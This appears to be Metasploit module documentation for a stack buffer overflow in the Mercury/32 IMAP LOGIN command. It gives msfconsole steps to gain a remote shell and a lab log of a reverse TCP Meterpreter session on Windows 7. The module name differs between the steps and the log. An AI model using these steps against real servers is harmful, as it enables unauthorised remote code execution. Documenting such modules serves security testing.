Mercury/32 <= 4.01b contains an stack based buffer overflow in IMAPD LOGIN verb. Sending an specially crafted IMAP login command allows remote code execution.

## Vulnerable Application

This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).

* [Mercury/32 v4.01a](https://www.exploit-db.com/apps/8e0bf8aec964af66a5d440ef705d548f-m32-401a.exe)
* [Mercury/32 v4.01b upgrade](http://web.archive.org/web/20070119125847if_/http://ftp.usm.maine.edu/pegasus/Mercury32/m32-401b.zip)

This module has been tested successfully on:

* Mercury/32 v4.01a on Windows XP SP3 (x86)
* Mercury/32 v4.01a on Windows 7 SP1 (x86)
* Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
* Mercury/32 v4.01b on Windows 7 SP1 (x86)

## Verification steps

  1. Install the vulnerable Mercury/32 application
  2. Start msfconsole
  3. Do: `use exploit/windows/imap/mercury_login`
  4. Do: `set RHOST IP`
  5. Do: `exploit`
  6. You should get a shell.

## Scenarios

### Mercury/32 v4.01a on Windows 7 SP1 x86
```
msf > use exploit/windows/imap/mercury_login1
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
rhost => 192.168.46.144
msf exploit(windows/imap/mercury_login1) > exploit

[*] Started reverse TCP handler on 192.168.46.1:4444
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
[*] Sending stage (179779 bytes) to 192.168.46.144
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200

meterpreter >
Computer        : WIN-DQ8ELRSOJAO
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```
